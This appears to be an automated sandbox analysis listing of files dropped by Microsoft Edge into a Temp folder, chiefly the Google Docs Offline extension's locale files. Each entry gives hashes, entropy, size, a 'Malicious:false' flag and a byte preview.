                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\c31232bb-8a72-42c0-90c5-8db331ac8922.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):31335
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                      MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                      SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                      SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                      SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1420
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.403963661938477
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0M45TFL0F7b5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5W
                                                                                                                                                                                                                                                                                      MD5:41FA1F75300AB95D346FC591D88A0D04
                                                                                                                                                                                                                                                                                      SHA1:6DB9ACA20E299A5A92F19610CD9F176A7FB8B6DD
                                                                                                                                                                                                                                                                                      SHA-256:8E17BB341DEB37E5F278DBBED938ACB9E280CA34321545AE051231EC74AEACA7
                                                                                                                                                                                                                                                                                      SHA-512:DA914816B9ED6B49FAABAD12A5B631A1408BC31670566B852353DDE9BFBAA3DA49C2AD8A7D7105ECA9DC7D458230CFE9FDD7D31754B4263B4533249C57B6D7EA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\1f2618a4-cae6-4b1a-aca9-26175bf9c069.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir2028_2080148529\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                      Malicious:false
